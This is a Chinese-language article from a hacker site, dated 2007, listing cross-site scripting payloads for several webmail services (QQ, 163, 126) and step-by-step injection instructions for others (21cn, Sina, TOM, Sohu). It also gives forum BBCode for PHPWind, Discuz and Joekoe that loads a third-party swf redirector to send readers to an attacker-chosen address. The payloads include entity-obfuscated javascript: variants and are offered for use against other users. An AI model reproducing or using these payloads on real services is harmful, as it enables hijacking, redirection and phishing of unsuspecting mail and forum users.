您现在的位置: 骇客基地 >> 黑客文章 >> 黑客攻防 >> 黑客入门 >> 正文

邮箱的内嵌式框架跨站漏洞
骇客基地 阅读: 时间:2007-11-5 1:22:34 来源:www.hookbase.com
   QQ邮箱: 
  <img src=document.write(’<Iframe%20src=输入你要跨的地址%20width=500%20height=550%3E</iframe%3E’)> 
  利用方法:"写信"—点击"显示工具条"—"<HTML>",输入跨站代码即可。 
   
  163邮箱: 
  <img src=j avascript:document.write(’%3CIframe%20src=输入你要跨的地址%20width=500%20height=550%3E%3C/iframe%3E’)> 
  利用方法:编辑源码处打上勾,输入跨站代码即可。 
   
  126邮箱(同时也适用于QQ邮箱): 
  <img src=javascri& #x70t:document.write(’& #x3cIframe%20src=输入你要跨的地址%20width=500%20height=550%3E</iframe% 3E’)> 
  利用方法:编辑源码处打上勾,输入跨站代码即可。 
   
  21cn邮箱: 
  利用方法:风格设为为"左右"—"写信"—"插入图片",在弹出的框里输入跨站代码即可。 
   
  新浪邮箱: 
  利用方法:"写信"—"插入图片",在弹出的框里输入跨站代码即可。 
   
  TOM邮箱: 
  利用方法:"写信"—"编辑HTML信件",再勾选上"编辑源码",输入跨站代码即可。 
   
  Sohu邮箱: 
  利用方法:直接发送即可,但要回复才能看见效果。 
   
  同时还适合于更多邮箱 
   
  BBS的直接跨站漏洞(swf跳转)—— 
   
  PHPWind论坛的跨站代码: [wmv]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/wmv] 
   
  Discuz论坛的跨站代码: [flash]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/flash] 

      Joekoe论坛的跨站代码: [QT=450,350]http://www.aground.cn/gq.swf?url=输入你要跨的地址[/QT] 
今天广告
参与评论:
注意事项:
【邮箱的内嵌式框架跨站漏洞】文章由骇客基地网上搜集,其立场行为并不代表本站。
如果您发现该文章若无意中侵犯到您的权利,请联系我们!
未经本站明确许可,任何网站不得非法盗链及抄袭本站资源;如引用页面,请注明来自本站,谢谢您的支持!
最近更新
最新推荐
     
 
黑客首页 | 服务指南 | 软件发布  | 关于我们 | 本站声明  | 隐私声明 | 诚征英才 | 网站地图 | 友情链接 |
 
 
中国·黑客·骇客·基地 请使用IE6.0版本, 分辩率1024×768进行浏览 www.hookbase.com 站长:利客 Email:hookbase@163.com
Copyright © 2004-2009 All Rights Reserved. 粤ICP备05000985号